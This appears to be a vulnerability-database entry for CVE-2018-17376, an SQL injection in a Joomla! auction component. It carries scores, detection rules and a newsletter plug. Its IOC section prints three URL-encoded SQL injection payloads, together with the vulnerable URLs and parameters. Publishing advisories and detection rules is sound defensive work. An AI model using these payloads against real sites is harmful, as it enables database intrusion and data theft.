cbcvebase.
CVE-2018-17376
published 2018-09-28

CVE-2018-17376: SQL Injection exists in the Reverse Auction Factory 4.3.8 component for Joomla! via the filter_order_Dir, cat, or filter_letter parameter.

PriorityP265critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.21%
86.6th percentile
SQL Injection exists in the Reverse Auction Factory 4.3.8 component for Joomla! via the filter_order_Dir, cat, or filter_letter parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
thephpfactoryreverse_auction_factory

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]
urlhttp://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]
urlhttp://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]
command%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
command%31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d
command%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
  • Detect HTTP requests to Joomla targeting the com_rbids component with the task=listauctions endpoint and a filter_order_Dir parameter containing SQL injection payloads (e.g. EXTRACTVALUE, CONCAT, USER(), DATABASE(), VERSION()).
  • Detect HTTP requests to Joomla targeting the com_rbids component with the task=listauctions endpoint and a cat parameter containing SQL injection payloads (e.g. error-based blind SQLi using information_schema.tables).
  • Detect HTTP requests to Joomla targeting the com_rbids component with the task=categories endpoint and a filter_letter parameter containing SQL injection payloads (e.g. AND EXTRACTVALUE with VERSION() and DATABASE()).
  • Alert on URL-encoded SQL injection strings in query parameters for option=com_rbids requests; payloads include encoded forms of EXTRACTVALUE, CONCAT, USER(), DATABASE(), VERSION(), and information_schema.tables references.
  • ·The exploit POC uses localhost as the target host; in real-world attacks the [PATH] and host will vary. Detection rules must be written to match the component identifier (option=com_rbids) and vulnerable parameter names rather than the host.
  • ·All three SQL injection payloads are URL-encoded; WAF/IDS rules must decode percent-encoded values before pattern matching to reliably detect the attack.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.